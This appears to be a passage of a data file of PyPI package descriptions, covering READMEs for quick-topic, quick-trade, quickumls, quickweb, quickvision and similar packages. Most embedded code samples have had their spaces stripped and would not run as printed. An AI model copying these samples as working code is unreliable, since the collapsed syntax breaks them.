labellabel_names=['\u7ecf\u6d4e','\u80fd\u6e90','\u516c\u6c11','\u653f\u5e9c']keywords_economics=['\u6295\u8d44','\u878d\u8d44','\u7ecf\u6d4e','\u79df\u91d1','\u653f\u5e9c','\u5c31\u4e1a','\u5c97\u4f4d','\u5de5\u4f5c','\u804c\u4e1a','\u6280\u80fd']keywords_energy=['\u7eff\u8272','\u6392\u653e','\u6c22\u80fd','\u751f\u7269\u80fd','\u5929\u7136\u6c14','\u98ce\u80fd','\u77f3\u6cb9','\u7164\u70ad','\u7535\u529b','\u80fd\u6e90','\u6d88\u8017','\u77ff\u4ea7','\u71c3\u6599','\u7535\u7f51','\u53d1\u7535']keywords_people=['\u5065\u5eb7','\u7a7a\u6c14\u6c61\u67d3','\u5bb6\u5ead','\u80fd\u6e90\u652f\u51fa','\u884c\u4e3a','\u4ef7\u683c','\u7a7a\u6c14\u6392\u653e\u7269','\u6b7b\u4ea1','\u70f9\u996a','\u652f\u51fa','\u53ef\u518d\u751f','\u6db2\u5316\u77f3\u6cb9\u6c14','\u6c61\u67d3\u7269','\u56de\u6536','\u6536\u5165','\u516c\u6c11','\u6c11\u4f17']keywords_government=['\u5b89\u5168','\u80fd\u6e90\u5b89\u5168','\u77f3\u6cb9\u5b89\u5168','\u5929\u7136\u6c14\u5b89\u5168','\u7535\u529b\u5b89\u5168','\u57fa\u7840\u8bbe\u65bd','\u96f6\u552e\u4e1a','\u56fd\u9645\u5408\u4f5c','\u7a0e\u6536','\u7535\u7f51','\u51fa\u53e3','\u8f93\u7535','\u7535\u7f51\u6269\u5efa','\u653f\u5e9c','\u89c4\u6a21\u7ecf\u6d4e']list_topics=[keywords_economics,keywords_energy,keywords_people,keywords_government]# call function to show trends of number of documents containing topic keywords each year-monthshow_year_month_trends_with_fulltext(meta_csv_file=\"datasets/list_country.csv\",list_topics=list_topics,label_names=label_names,save_result_path=\"results/topic_trends/trends_fulltext.csv\",minimum_year=2010,raw_text_path=r\"datasets/raw_text\",id_field='fileId',time_field='date',prefix_filename=\"text_\")Example 7: Estimate the correlation between two trendsfromquick_topic.topic_trends_correlation.topic_trends_correlation_twoimport*trends_file=\"results/topic_trends/trends_fulltext.csv\"label_names=['\u7ecf\u6d4e','\u80fd\u6e90','\u516c\u6c11','\u653f\u5e9c']list_result=[]list_line=[]foriinrange(0,len(label_names)-1):forjinrange(i+1,len(label_names)):label1=label_names[i]label2=label_names[j]result=estimate_topic_trends_correlation_single_file(trend_file=trends_file,selected_field1=label1,selected_field2=label2,start_year=2010,end_year=2021,show_figure=False,time_field='Time')list_result=[]line=f\"({label1},{label2})\\t{result['pearson'][0]}\\t{result['pearson'][1]}\"list_line.append(line)print()print(\"Correlation analysis resutls:\")print(\"Pair\\tPearson-Stat\\tP-value\")forlineinlist_line:print(line)Example 8: Estimate topic similarity between two groups of LDA topicsfromquick_topic.topic_modeling.ldaimportbuild_lda_modelsfromquick_topic.topic_similarity.topic_similarity_by_categoryimport*# Step 1: build topic modelsmeta_csv_file=\"datasets/list_country.csv\"raw_text_folder=\"datasets/raw_text\"list_term_file=[\"../datasets/keywords/countries.csv\",\"../datasets/keywords/leaders_unique_names.csv\",\"../datasets/keywords/carbon2.csv\"]stop_words_path=\"../datasets/stopwords/hit_stopwords.txt\"list_category=build_lda_models(meta_csv_file=meta_csv_file,raw_text_folder=raw_text_folder,output_folder=\"results/topic_similarity_two/topics\",list_term_file=list_term_file,stopwords_path=stop_words_path,prefix_filename=\"text_\",num_topics=6,num_words=50)# Step 2: estimate similarityoutput_folder=\"results/topic_similarity_two/topics\"keywords_file=\"../datasets/keywords/carbon2.csv\"estimate_topic_similarity(list_topic=list_category,topic_folder=output_folder,list_keywords_file=keywords_file,)Example 9: Stat sentence numbers by keywordsfromquick_topic.topic_stat.stat_by_keywordimport*meta_csv_file='datasets/list_country.csv'raw_text_folder=\"datasets/raw_text\"keywords_energy=['\u7164\u70ad','\u5929\u7136\u6c14','\u77f3\u6cb9','\u751f\u7269','\u592a\u9633\u80fd','\u98ce\u80fd','\u6c22\u80fd','\u6c34\u529b','\u6838\u80fd']stat_sentence_by_keywords(meta_csv_file=meta_csv_file,keywords=keywords_energy,id_field=\"fileId\",raw_text_folder=raw_text_folder,contains_keyword_in_sentence='',prefix_file_name='text_')Example 9: English topic modelingfromquick_topic.topic_visualization.topic_modeling_pipelineimport*## datameta_csv_file=\"datasets_en/list_blog_meta.csv\"raw_text_folder=f\"datasets_en/raw_text\"stopwords_path=\"\"## parameterschinese_font_file=\"\"num_topics=8num_words=20n_rows=2n_cols=4max_records=-1## outputresult_output_folder=f\"results/en_topic{num_topics}\"ifnotos.path.exists(result_output_folder):os.mkdir(result_output_folder)run_topic_modeling_pipeline(meta_csv_file=meta_csv_file,raw_text_folder=raw_text_folder,stopwords_path=stopwords_path,top_record_num=max_records,chinese_font_file=\"\",num_topics=num_topics,num_words=num_words,n_rows=n_rows,n_cols=n_cols,result_output_folder=result_output_folder,load_existing_models=False,lang='en',prefix_filename='')LicenseThequick-topictoolkit is provided byDonghua Chenwith MIT License."} +{"package": "quick-torch", "pacakge-description": "Quick, Torch!Quick, Torch! is a simple package that provides a\"Quick, Draw!\"dataset using the abstract classVisionDataset, provided bytorchvisionAPI. This package mirrors theMNISTdataset provided in torchvision.You can install this package withpip install quick-torch --upgradeExampleHere are a simple example of usage:fromquick_torchimportQuickDrawimporttorchvision.transformsasTds=QuickDraw(root=\"dataset\",categories=\"face\",download=True,transform=T.Resize((128,128)))print(f\"{len(ds)= }\")first_data=ds[0]first_data>>>Downloadinghttps://storage.googleapis.com/quickdraw_dataset/full/numpy_bitmap/face.npy>>>>>>len(ds)=161666>>>(,108)For more examples, please refer to the notebookexample.ipynbReferencesThis work was mainly inspired by the following repositories:MNIST from torchvisionThe dataset of this notebook"} +{"package": "quicktracer", "pacakge-description": "# Quicktrace\n## Call trace and see what your program is up to.# Demo: Trace some dummy dataimportmathimporttimefromquicktracerimporttraceforiinrange(2000):trace(30*math.sin(i/30))trace(.3*math.cos(i/20))time.sleep(0.002)"} +{"package": "quicktrack", "pacakge-description": "No description available on PyPI."} +{"package": "quick-trade", "pacakge-description": "quick_tradeDependencies:\n \u251c\u2500\u2500ta (Bukosabino https://github.com/bukosabino/ta (by Dar\u00edo L\u00f3pez Padial))\n \u251c\u2500\u2500plotly (https://github.com/plotly/plotly.py)\n \u251c\u2500\u2500pandas (https://github.com/pandas-dev/pandas)\n \u251c\u2500\u2500numpy (https://github.com/numpy/numpy)\n \u251c\u2500\u2500tqdm (https://github.com/tqdm/tqdm)\n \u251c\u2500\u2500scikit-learn (https://github.com/scikit-learn/scikit-learn)\n \u2514\u2500\u2500ccxt (https://github.com/ccxt/ccxt)Documentation:\ud83d\udea7https://quick-trade.github.io/quick_trade/#/\ud83d\udea7Twitter:@quick_trade_twDiscord:quick_tradeInstallation:Quick install:$ pip3 install quick-tradeFor development:$ git clone https://github.com/quick-trade/quick_trade.git\n$ pip3 install -r quick_trade/requirements.txt\n$ cd quick_trade\n$ python3 setup.py install\n$ cd ..Customize your strategy!fromquick_trade.plotsimportTraderGraph,make_trader_figureimportccxtfromquick_tradeimportstrategy,TradingClient,Traderfromquick_trade.utilsimportTradeSideclassMyTrader(qtr.Trader):@strategydefstrategy_sell_and_hold(self):ret=[]foriinself.df['Close'].values:ret.append(TradeSide.SELL)self.returns=retself.set_credit_leverages(2)# if you want to use a leverageself.set_open_stop_and_take(stop)# or... set a stop loss with only one line of codereturnretclient=TradingClient(ccxt.binance())df=client.get_data_historical(\"BTC/USDT\")trader=MyTrader(\"BTC/USDT\",df=df)trader.connect_graph(TraderGraph(make_trader_figure()))trader.set_client(client)trader.strategy_sell_and_hold()trader.backtest()Find the best strategy!importquick_tradeasqtrimportccxtfromquick_trade.tunerimport*fromquick_tradeimportTradingClientclassTest(qtr.ExampleStrategies):@strategydefstrategy_supertrend1(self,plot:bool=False,*st_args,**st_kwargs):self.strategy_supertrend(plot=plot,*st_args,**st_kwargs)self.convert_signal()# only long tradesreturnself.returns@strategydefmacd(self,histogram=False,**kwargs):ifnothistogram:self.strategy_macd(**kwargs)else:self.strategy_macd_histogram_diff(**kwargs)self.convert_signal()returnself.returns@strategydefpsar(self,**kwargs):self.strategy_parabolic_SAR(plot=False,**kwargs)self.convert_signal()returnself.returnsparams={'strategy_supertrend1':[{'multiplier':Linspace(0.5,22,5)}],'macd':[{'slow':Linspace(10,100,3),'fast':Linspace(3,60,3),'histogram':Choise([False,True])}],'psar':[{'step':0.01,'max_step':0.1},{'step':0.02,'max_step':0.2}]}tuner=QuickTradeTuner(TradingClient(ccxt.binance()),['BTC/USDT','OMG/USDT','XRP/USDT'],['15m','5m'],[1000,700,800,500],params)tuner.tune(Test)print(tuner.sort_tunes())tuner.save_tunes('quick-trade-tunes.json')# save tunes as JSONYou can also set rules for arranging arguments for each strategy by using_RULES_andkwargsto access the values of the arguments:params={'strategy_3_sma':[dict(plot=False,slow=Choise([2,3,5,8,13,21,34,55,89,144,233,377,610,987,1597]),fast=Choise([2,3,5,8,13,21,34,55,89,144,233,377,610,987,1597]),mid=Choise([2,3,5,8,13,21,34,55,89,144,233,377,610,987,1597]),_RULES_='kwargs[\"slow\"] > kwargs[\"mid\"] > kwargs[\"fast\"]')],}User's code example (backtest)fromquick_tradeimportbrokersfromquick_tradeimporttrading_sysasqtrfromquick_trade.plotsimport*importccxtfromnumpyimportinfclient=brokers.TradingClient(ccxt.binance())df=client.get_data_historical('BTC/USDT','15m',1000)trader=qtr.ExampleStrategies('BTC/USDT',df=df,interval='15m')trader.set_client(client)trader.connect_graph(TraderGraph(make_trader_figure(height=731,width=1440,row_heights=[10,5,2])))trader.strategy_2_sma(55,21)trader.backtest(deposit=1000,commission=0.075,bet=inf)# backtest on one pairOutput plotly chart:Output printlosses: 12\ntrades: 20\nprofits: 8\nmean year percentage profit: 215.1878652911773%\nwinrate: 40.0%\nmean deviation: 2.917382949881604%\nSharpe ratio: 0.02203412259055281\nSortino ratio: 0.02774402450236864\ncalmar ratio: 21.321078596349782\nmax drawdown: 10.092728860725552%Run strategyUse the strategy on real moneys. YES, IT'S FULLY AUTOMATED!importdatetimefromquick_trade.trading_sysimportExampleStrategiesfromquick_trade.brokersimportTradingClientfromquick_trade.plotsimportTraderGraph,make_figureimportccxtticker='MATIC/USDT'start_time=datetime.datetime(2021,# year6,# month24,# day5,# hour16,# minute57)# second (Leave a few seconds to download data from the exchange)classMyTrade(ExampleStrategies):@strategydefstrategy(self):self.strategy_supertrend(multiplier=2,length=1,plot=False)self.convert_signal()self.set_credit_leverages(1)self.sl_tp_adder(10)returnself.returnskeys={'apiKey':'your api key','secret':'your secret key'}client=TradingClient(ccxt.binance(config=keys))# or any other exchangetrader=MyTrade(ticker=ticker,interval='1m',df=client.get_data_historical(ticker,limit=10))fig=make_trader_figure()graph=TraderGraph(figure=fig)trader.connect_graph(graph)trader.set_client(client)trader.realtime_trading(strategy=trader.strategy,start_time=start_time,ticker=ticker,limit=100,wait_sl_tp_checking=5)Additional ResourcesOld documentation (V3 doc):https://vladkochetov007.github.io/quick_trade.github.ioLicensequick_tradebyVladyslav Kochetovis licensed under aCreative Commons Attribution-NonCommercial-ShareAlike 4.0 International License.Permissions beyond the scope of this license may be available atvladyslavdrrragonkoch@gmail.com."} +{"package": "quicktranslate", "pacakge-description": "you can use this in the command line,this is a example:trans -t exampleor:trans --trans example\u2018example\u2019 means what you want to translate"} +{"package": "quicktrash", "pacakge-description": "ExampleCommand:python3 -m quicktrash file0.txt file1.pdf folderOutput:/home/user/.quicktrash/0x2/home/user/Documents/file0.txt\n/home/user/.quicktrash/0x2/home/user/Documents/file1.pdf\n/home/user/.quicktrash/0x2/home/user/Documents/folderPython ExamplesUsing context:importquicktrashwithquicktrash.Trash(\"example-trashdir\")astrash:trash.recycle(\"example-file.txt\")Using next()importquicktrashtr=quicktrash.Trash(\"example-trashdir\")trlet:quicktrash.Trashlet=next(tr)trlet.recycle(\"example-file.txt\")"} +{"package": "quickui", "pacakge-description": "QuickUITable of ContentsInstallationLicenseInstallationpip install quickuiLicensequickuiis distributed under the terms of theMITlicense."} +{"package": "quickumls", "pacakge-description": "NEW: v.1.4 supports starting multiple QuickUMLS matchers concurrently!I've finally added support forunqliteas an alternative to leveldb for storage of CUIs and Semantic Types (seeherefor more details). unqlite-backed QuickUMLS installation support multiple matchers running at the same time. Other than better multi-processing support, unqlite should have better support for unicode.QuickUMLSQuickUMLS (Soldaini and Goharian, 2016) is a tool for fast, unsupervised biomedical concept extraction from medical text.\nIt takes advantage ofSimstring(Okazaki and Tsujii, 2010) for approximate string matching.\nFor more details on how QuickUMLS works, we remand to our paper.This project should be compatible with Python 3 (Python 2 isno longer supported) and run on any UNIX system (support for Windows is experimental, please report bugs!).If you find any bugs, please file an issue on GitHub or email the author atluca@ir.cs.georgetown.edu.InstallationObtain a UMLS installationThis tool requires you to have a valid UMLS installation on disk. To install UMLS, you must first obtain alicensefrom the National Library of Medicine; then you should download all UMLS files fromthis page; finally, you can install UMLS using theMetamorphoSystool asexplained in this guide. The installation can be removed once the system has been initialized.Install QuickUMLS: You can do so by either runningpip install quickumlsorpython setup.py install. On macOS, using anaconda isstrongly recommended\u2020.Create a QuickUMLS installationInitialize the system by runningpython -m quickumls.install , whereis where the installation files are (in particular, we needMRCONSO.RRFandMRSTY.RRF) andis the directory where the QuickUmls data files should be installed. This process will take between 5 and 30 minutes depending how fast the CPU and the drive where UMLS and QuickUMLS files are stored are (on a system with a Intel i7 6700K CPU and a 7200 RPM hard drive, initialization takes 8.5 minutes).python -m quickumls.installsupports the following optional arguments:-L/--lowercase: if used, all concept terms are folded to lowercase before being processed. This option typically increases recall, but it might reduce precision;-U/--normalize-unicode: if used, expressions with non-ASCII characters are converted to the closest combination of ASCII characters.-E/--language: Specify the language to consider for UMLS concepts; by default, English is used. For a complete list of languages, please seethis table provided by NLM.-d/--database-backend: Specify which database backend to use for QuickUMLS. The two options areleveldbandunqlite. The latter supports multi-process reading and has better unicode compatibility, and it used as default for all new 1.4 installations; the former is still used as default when instantiating a QuickUMLS client. More info about differences between the two databases and migration info are availablehere.\u2020: If the installation fails on macOS when using Anaconda, installleveldbfirst by runningconda install -c conda-forge python-leveldb.APIsA QuickUMLS object can be instantiated as follows:fromquickumlsimportQuickUMLSmatcher=QuickUMLS(quickumls_fp,overlapping_criteria,threshold,similarity_name,window,accepted_semtypes)Where:quickumls_fpis the directory where the QuickUMLS data files are installed.overlapping_criteria(optional, default: \"score\") is the criteria used to deal with overlapping concepts; choose \"score\" if the matching score of the concepts should be consider first, \"length\" if the longest should be considered first instead.threshold(optional, default: 0.7) is the minimum similarity value between strings.similarity_name(optional, default: \"jaccard\") is the name of similarity to use. Choose between \"dice\", \"jaccard\", \"cosine\", or \"overlap\".window(optional, default: 5) is the maximum number of tokens to consider for matching.accepted_semtypes(optional, default: seeconstants.py) is the set of UMLS semantic types concepts should belong to. Semantic types are identified by the letter \"T\" followed by three numbers (e.g., \"T131\", which identifies the type\"Hazardous or Poisonous Substance\"). Seeherefor the full list.To use the matcher, simply calltext=\"The ulna has dislocated posteriorly from the trochlea of the humerus.\"matcher.match(text,best_match=True,ignore_syntax=False)Setbest_matchtoFalseif you want to return overlapping candidates,ignore_syntaxtoTrueto disable all heuristics introduced in (Soldaini and Goharian, 2016).If the matcher throws a warning during initialization, readthis pageto learn why and how to stop it from doing so.spaCy pipeline componentQuickUMLS can be used for standalone processing but it can also be use as a component in a modular spaCy pipeline. This follows traditional spaCy handling of concepts to be entity objects added to the Document object. These entity objects contain the CUI, similarity score and Semantic Types in the spacy \"underscore\" object.Adding QuickUMLS as a component in a pipeline can be done as follows:fromquickumls.spacy_componentimportSpacyQuickUMLS# common English pipelinenlp=spacy.load('en_core_web_sm')quickumls_component=SpacyQuickUMLS(nlp,'PATH_TO_QUICKUMLS_DATA')nlp.add_pipe(quickumls_component)doc=nlp('Pt c/o shortness of breath, chest pain, nausea, vomiting, diarrrhea')forentindoc.ents:print('Entity text :{}'.format(ent.text))print('Label (UMLS CUI) :{}'.format(ent.label_))print('Similarity :{}'.format(ent._.similarity))print('Semtypes :{}'.format(ent._.semtypes))Server / Client SupportStarting with v.1.2, QuickUMLS includes a support for being used in a client-server configuration. That is, you can start one QuickUMLS server, and query it from multiple scripts using a client.To start the server, runpython -m quickumls.server:python-mquickumls.server/path/to/quickumls/files{-PQuickUMLSport}{-HQuickUMLShost}{QuickUMLSoptions}Host and port are optional; by default, QuickUMLS runs onlocalhost:4645. You can also pass any QuickUMLS option mentioned above to the server. To obtain a list of options for the server, runpython -m quickumls.server -h.To load the client, importget_quickumls_clientfromquickumls:fromquickumlsimportget_quickumls_clientmatcher=get_quickumls_client()text=\"The ulna has dislocated posteriorly from the trochlea of the humerus.\"matcher.match(text,best_match=True,ignore_syntax=False)The API of the client is the same of a QuickUMLS object.In case you wish to run the server in the background, you can do so as follows:nohuppython-mquickumls.server/path/to/QuickUMLS{serveroptions}>/dev/null2>&1&echo$!>nohup.pidWhen you are done, don't forget to stop the server by running.kill-9`catnohup.pid`rmnohup.pidReferencesOkazaki, Naoaki, and Jun'ichi Tsujii. \"Simple and efficient algorithm for approximate dictionary matching.\" COLING 2010.Luca Soldaini and Nazli Goharian. \"QuickUMLS: a fast, unsupervised approach for medical concept extraction.\" MedIR Workshop, SIGIR 2016."} +{"package": "quickumls-simstring", "pacakge-description": "Orginal version bychokkan, availablehere. New version (compiles\nunder macOS) fromhere.Windows/Anaconda/VisualStudio specific steps:Make sure that iconv is available to your desired conda environment:conda install-cconda-forgelibiconvThen, open a Visual Studio Developer Prompt (e.g. \u201cVS 2015 x64\nDeveloper Command Prompt\u201d or \u201cVS 2015 x86 Developer Command Prompt\u201d)Now you can any of these commands to build or install:pythonsetup.pybuildpythonsetup.pyinstallNOTE: If there is a failure that \u2018rc.exe\u2019 cannot be found, add\nthe appropriate WindowKits binary path to PATH. More info on thishere."} +{"package": "quickunit", "pacakge-description": "Given standard test setup, will determine which tests need to run against a given diff.For example, say you\u2019re working in your branch called my-new-sexy-feature, which modifies the following files:src/foo/bar/__init__.py\nsrc/foo/bar/baz.py\nsrc/foo/biz.pyIf you\u2019re using a traditional test layout, we\u2019ll automatically add the following rule for you:tests/{path}/test_{filename}Otherwise you can add rules using regular expression syntax in combination with the path and filename formatters.Now if we run with the default options,nosetests--with-quickunit, it will look for tests (by default) in\nthe following base directories:tests/src/foo/bar/test_baz.py\ntests/src/foo/test_biz.py(It does this by analyzing the diff against master, and determining which files you\u2019ve changed\nare tests, including them, and which files containing test coverage in a parallel directory.)ConfigIf you want to support multiple directories for searching (let\u2019s say you break up unittests from integration tests)\nyou can do that as well:::\u2013quickunit-rule=tests/{path}/test_{filename} \u2013quickunit-rule=tests/{path}/{basename}/tests.pyOr, if you\u2019d prefer, viasetup.cfg:quickunit-rule = tests/{path}/test_{filename}\n tests/{path}/{basename}/tests.pyRulesRules are a combination of simple formatting a regular expressions.The following formatted variables are available within a rule:{path}The base path of the filename (e.g. foo/bar){filename}The filename excluding the path (e.g. baz.py){basename}The filename excluding the extension (e.g. baz)A rule is first formatted (using.format(params)) and then compiled into a regular expression on top of each changed file."} +{"package": "quickutil", "pacakge-description": "quickutilQuick and easy access to python functionsInstallationView on PyPihttps://pypi.org/project/quickutil/Install on Windowspy -m pip install quickutilInstall on Unix/macOSpython3 -m pip install quickutil"} +{"package": "quickutil4py", "pacakge-description": "No description available on PyPI."} +{"package": "quick-vcn", "pacakge-description": "Set up an OCI VCN and components quicklyTo install:pip install -e .To use:quick-vcn --profile YOUR-PROFILE \\\n --compartment YOUR-COMPARTMENT-NAME \\\n --region uk-london-1 \\\n [ --vcn-name \"net\" ] \\\n [ --vcn-cidr 10.0.0.0/16 ] \\\n [ --subnet-name \"sub\" ] \\\n [ --subnet-cidr 10.0.0.0/24 ]"} +{"package": "quickvec", "pacakge-description": "QuickVecQuickVec is a simple package to make it easy to work with word embeddings.\nQuickVec supports instantaneous loading of word embeddings after converting\nthem to a native SQLite format. QuickVec is designed to do exactly one thing\nwell: allow you to quickly load word embeddings and look up the vectors for\nwords.Installationpip install quickvec(requires Python 3.6+)Design philosophyQuickVec was created to supportNERPy,\na named entity recognition framework that uses word embeddings for feature\ngeneration. NERPy originally used gensim, but the time and memory required to\nload a word embedding completely into memory was a large performance\nbottleneck. NERPy then turned to Magnitude, but its conversion process is quite\nslow, and its installation process caused problems for NERPy users.\nThe NERPy developers created QuickVec based on the design of Magnitude,\nbut with the goal of creating a package with minimal features and dependencies.FAQHow does QuickVec compare togensim'sKeyedVectorsfor loading word embeddings?QuickVec can load word embeddings instantaneously after conversion to its\nnative SQLite-based format, and does not load the whole embedding into memory,\nmaking it more memory efficient. However, QuickVec only supports text-format\nword embeddings files, and in general has far less functionality.How does QuickVec compare toMagnitudefor loading word embeddings?Like Magnitude, QuickVec can instantly load word embeddings after conversion\nto its native SQLite-based format. QuickVec's conversion process is faster\nthan Magnitude's. However, QuickVec does not support many of Magnitude's\nfeatures, such as word similarity or generating vectors for out-of-vocabulary\nwords, and QuickVec does not provide pre-converted word embeddings and only\nsupports loading from text-format embeddings."} +{"package": "quickverifyimg", "pacakge-description": "No description available on PyPI."} +{"package": "quickvision", "pacakge-description": "QuickvisionFaster Computer Vision.Install QuickvisionInstall from PyPi.Current stablerelease 0.1.1needsPyTorch 1.7.1andtorchvision 0.8.2.pip install quickvisionWhat is Quickvision?Quickvision makes Computer Vision tasks much faster and easier with PyTorch.It provides: -Easy to use PyTorch native API, forfit(),train_step(),val_step()of models.Easily customizable and configurable models with various backbones.A complete PyTorch native interface. All models arenn.Module, all the training APIs are optional and not binded to models.A lightning API which helps to accelerate training over multiple GPUs, TPUs.A datasets API to convert common data formats very easily and quickly to PyTorch formats.A minimal package, with very low dependencies.Train your models faster. Quickvision has already implemented the long learning in PyTorch.Quickvision is just PyTorch!!Quickvision does not make you learn a new library. If you know PyTorch, you are good to go!!!Quickvision does not abstract any code from PyTorch, nor implements any custom classes over it.It keeps the data format inTensorso that you don't need to convert it.Do you want just a model with some backbone configuration?Use model made by us. It's just ann.Modulewhich has Tensors only Input and Output format.Quickvision provides reference scripts too for training it!Do you want to train your model but not write lengthy loops?Just use our training methods such asfit(),train_step(),val_step().Do you want multi GPU training but worried about model configuration?Just subclass the PyTorch Lightning model!Implement thetrain_step(),val_step()."} +{"package": "quickviz", "pacakge-description": "Widgets for quickly visualizing pandas dataframesIt is often necessary to plot data in order to understand it. Plotting\nallows to quiclky spot glitches in the data: that person who is 180 meters\ntall or this car which can speed thousands of kilometers per hour will\nimmediately stand out. In this situation, one wants a way to quickly\n(rather than beautifully) plot their data. Quickviz provides a set of\nwidgets to do this in a few clicks."} +{"package": "quickweb", "pacakge-description": "QuickWebQuickWeb is a Python Web Application Server based on the production-provedCherryPyWeb Framework extended with developer friendly features.FeaturesDevelopmentCustom static content folders (any folder containing a.staticfile)Automatic path based routing for templates and controllers, e.g.:/about.html is available as /about/submit.py is available as /submitZero code Jinja2 template rendering for .html files, that can:Use data from YAML files (name.html < name.yaml)Use HTTP specific data e.g.{{session}}Zero code Markdown files renderingLow code Python controllersIntegrated HTTP functional TestingReload on code changesProductionSSLsupportMutual TLSsupportInstallingQuickWeb requires Python3.6+ and can run on Windows, Linux or Mac.Install quickweb using pip:pipinstallquickwebIf the installation is succesful thequickwebcommand will be available, it will allow you to manage quickweb applications from the command line.Getting StartedCreating your first applicationCreate your first quickweb app using a bootstrap based template:quickwebcreatemy-web-appbootstrap-navbar-fixed-topYou will get amy-web-appdirectory containing a quickweb sample app using theBootstraplibrary.Changing the application contentCheck the application directory using your preferred HTML/CSS/JavaScript editor/IDE, edit the the content from thewebrootdirectory as needed.Starting the applicationAfter making some changes and you can test the application executing:quickwebrunmy-web-appA web server is started using port 8080 on your local system. You can check your application by browsing tohttp://localhost:8080. If you later change some of the YAML/HTML/CSS/JS, you can check the changes by refreshing the corresponding page on your browser.Deploying to a cloud platformWhen your application is ready for public access you can deploy it to a cloud platform, it has been tested with the following providers:Heroku Cloud Application Platform (deploy with: git push heroku master)IBM Bluemix (deploy with: cf push appname)Other CloudFoundry based provider (deploy with: cf push appname)It should be able to run from otherCloud Foundrybased providers.NOTES:Check the cloud provider documentation for the web app detailed setup instructionsUse the instructions for python web applications setup/deploymentThe level of support for python based apps will depend on your provider, check it's documentation for detailsContributingCheck theContributing Guide.Maintained ByJo\u00e3o Pinto for theOpen Pipeinitiative"} +{"package": "quick-xinput", "pacakge-description": "Quick XinputDoes it drive you mad when you're living that keyboard-driven terminal lifestyle\nand your wrist grazes the touchpad sending you off to a different window or\ndesktop?If so,quick_xinputis the Python module you need in your life. Bring up a\nquick selector in the terminal,fzf, or with a GUI,rofiand select an\nxinput device to toggle on/off.Usage# toggle a device using fzfpython-mquick_xinput# toggle a device using rofipython-mquick_xinput--rofi# disable a device with rofi (good for keybindings)python-mquick_xinputoff--rofiSource of TruthThis project is available onGitHubandGitLab. Each push tomasterautomatically goes to both so choose whichever platform you prefer."} +{"package": "quickxorhash", "pacakge-description": "This python library is a Cython wrapper for the [original C implementation](https://https://github.com/flowerysong/quickxorhash).\nquickxorhash is a C library (libqxh) implementing Microsoft\u2019s QuickXORHash algorithm.## AlgorithmQuickXORHash is a non-cryptographic hash function that XORs the input\nbytes in a circular shift pattern, then XORs the least significant\nbits of the hash with the input length. The canonical representation\nof the resulting hash is a Base64 encoded string, because hexadecimal\nis too plebeian.## Usage`python >>> import quickxorhash >>> h = quickxorhash.quickxorhash() >>> h.update(b'hello world') >>>print(h.digest())b'h(\\x03\\x1b\\xd8\\xf0\\x06\\x10\\xdc\\xe1\\rrk\\x03\\x19\\x00\\x00\\x00\\x00\\x00'>>> import base64 >>>print(base64.b64encode(h.digest()))b'aCgDG9jwBhDc4Q1yawMZAAAAAAA=' `"} +{"package": "quicky-repo", "pacakge-description": "Fast Repo\u26a1 Initialize your projects as fast as you want. \u26a1\ud83c\udfb2 PrerequisitesTo run this project you will need to havePythonandNode.Node Version Managers:fnm,nvm,asdf...Python Version Managers:pyenv,virtualenv...\u2b07\ufe0f How to install and use itgitclonehttps://github.com/kauefraga/fast-repo.gitcdfast-repo\n\npipinstall-rrequirements.txt# Has nothing to try out now...You are welcome to open issues and pull requests!\ud83d\udee0 TechnologiesThe following tools have been used to build the project:\ud83d\udc0dPython- A programming language that lets you work quickly\nand integrate systems more effectively.\ud83d\udd76Click- Composable command line interface toolkit\ud83c\udfa8Rich- Rich is a Python library for rich text and beautiful formatting in the terminal.\ud83d\udcdd LicenseThis project is licensed under the MIT License - See theLICENSEfor more information."} +{"package": "quick-zip", "pacakge-description": "About the ProjectDocumentationWhat QuickZip IsQuickZip is a CLI utility I developed to solve a backup problem on my machines. I wanted a way to quickly backup up small sets of configuration files and data without deploying a massive, hard to maintain tool with too much front-end configuration. QuickZip uses a config.toml file to build tiny list of backups that are conducted when called (typically via cron).Key FeaturesCreate jobs with configuration file, including support for variables and defaultsBeautiful CLIBackup AuditsWebhook Support$quick-zip--helpUsage: qz [OPTIONS] COMMAND [ARGS]...Options:--verbose / --no-verbose [default: False]--install-completion [bash|zsh|fish|powershell|pwsh]Install completion for the specified shell.--show-completion [bash|zsh|fish|powershell|pwsh]Show completion for the specified shell, tocopy it or customize the installation.--help Show this message and exit.Commands:audit \ud83e\uddd0 Performs ONLY the audits for configured jobsconfig \ud83d\udcc4 displays the configuration filedocs \ud83d\udcac Opens quickZip documentation in browserjobsrun \u2728 The main entrypoint for the application.What QuickZip Isn'tQuickZip is NOT a replacement for a robust backup or imaging software. It's primary use case is to collect configuration files on system other similar types of files, zip them up, and stick them somewhere else on your file system.Why notx???I can't comment on every backup utility but I can mention the few that I looked at.Borgwas a strong contender and I will likely use it for other things down the line, however I felt like there was too much upfront configuration before being able to use.Rsync/Rclonewere both great options but I felt there were too confusing/robust for what I was trying to do. On top of that, I was looking for a few features that I hadn't seen.Backup Audits: The ability to \"audit\" backups and specify how old the newest backup should beWebhook Support: Send backup data to Home Assistant for notifications and dashboards.Also, I just like building stuff. \ud83d\udc4d"} +{"package": "quickzoom", "pacakge-description": "quickzoomquickzoom is a python command line tool that enables you easy connecting to zoom roomsFree software: MIT licenseFeaturesAfter pip install you can use the following commands in the command linequickzoom Will search your config file for the room label. If the room label exists. Tt willl grabd the meeting id and password and connect to zoom.quickzoom \u2013newroom / -nWill create a new room in your config. Will prompt you for room label, meeting id, meeting password.All your rooms will be saved in your homedirectory/.quickzoom/rooms.json:windows: C:/Users/User/.quickzoom/rooms.jsonOf course you can also manually edit the rooms.json file and quickly paste in some zoom rooms.ToDoimplement connect.get_zoom_exe() for macOs and linuximplement connect.connect_to_meeting() for macOs and linuxCreditsThis package was created withCookiecutterand theaudreyr/cookiecutter-pypackageproject template.History0.2.1 (2020-11-19)First release on PyPI.newroom flag: user will be prompted for room lable, meeting id, room password. Will be saved in config file.raise error if on macOs or linux"} +{"package": "quicli", "pacakge-description": "A wrapper around Python\u2019s argparse module. Provides argparsefunctionality in a simpler, easier-to-use interface, driven by function\nmetadata and decorators, with data validation.For usage, visithttp://dev.kylealanhale.com/wiki/projects/quicli"} +{"package": "quicly", "pacakge-description": "No description available on PyPI."} +{"package": "quicly-mongo", "pacakge-description": "No description available on PyPI."} +{"package": "quicly-redis", "pacakge-description": "No description available on PyPI."} +{"package": "quico", "pacakge-description": "QuicoQuico ou quick-container est un raccourci pour docker. Il permet de compiler et lancer rapidement un conteneur.Environnement requispython 